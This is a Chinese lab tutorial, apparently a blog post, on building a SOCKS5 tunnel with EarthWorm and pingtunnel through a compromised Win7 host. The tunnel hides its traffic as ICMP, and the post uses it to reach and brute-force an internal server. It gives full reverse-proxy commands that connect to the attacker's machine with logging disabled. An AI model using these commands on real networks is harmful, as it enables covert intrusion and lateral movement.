zoukankan      html  css  js  c++  java
  • ew+pingtunnel组合建立socks5隧道

     
     
     
     
     
     
     
     
     
     
     

    0x00 实验环境

    攻击机:win(192.168.43.131)+kali(192.168.43.217)

    受害机:win7(IP:192.168.43.50、192.168.59.133;双网卡,一个公网一个内网)、winserver2008(IP:192.168.59.18;仅主机:一个内网)

    0x01 实验效果

    在已经拿到公网win7服务器的前提下,通过ew与pingtunnel搭建能通往winserver2008的隧道,获取winserver2008的服务器权限

    0x02 实验准备

    工具:ew、pingtunnel、proxifer(代理工具)

    https://github.com/idlefire/ew
    https://github.com/esrrhs/pingtunnel

    proxifer官网自行下载

    工具介绍:

    ew

    EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。

    pingtunnel

    pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具

     

     0x03 打通隧道

    1、kali执行:

    ./ew_for_linux64 -s rcsocks -l 10080 -e 8898
    
    10080作为连接隧道的端口,8898作为隧道的通道,可以想象为,通向内网主机的路口为10080,走的这条路为8898。8898上所有的人(流量)都会通往10080这个路口。

    2、kali执行:

    ./pingtunnel -type server
    意思是将ew启动的sock5协议转换为icmp协议来隐藏传输

    3、肉鸡win7执行:

    pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.43.217 -t 192.168.43.217:8898 -sock5 -1 -noprint 1 -nolog 1
    意思是8898这条路上的sock5流量信息隐藏为icmp类型的数据在本肉鸡的9999端口进行转发。

    4、肉鸡win7执行:

    ew.exe -s rssocks -d 127.0.0.1 -e 9999
    在本肉鸡9999端口开启转发流量

    出现上述错误时,是因为你在运行pingtunnel时没有以管理员的身份运行cmd

    如下就可以显示成功了:

    5、kali上出现OK字样时表示代理搭建完成:

    6、使用proxifer来访问内网:

    此时再次访问win2008那台仅仅为内网的主机:

    7、kali通过win7搭建了隧道,实现了内网横向的证明:ping winserver2008是不通的,但是挂好代理可以进行59.18的数据库弱口令爆破!

  • 相关阅读:
    Python--day72--ajax简介
    Python基础1 介绍、基本语法
    10-Python-字符编码
    09-Python-集合
    07-Python-字符串操作
    99-Python-深浅拷贝
    06-Python-字典
    05-Python-判断语句
    04-Python-元组
    03-Python-操作列表
  • 原文地址:https://www.cnblogs.com/cute-puli/p/15213394.html
Copyright © 2011-2022 走看看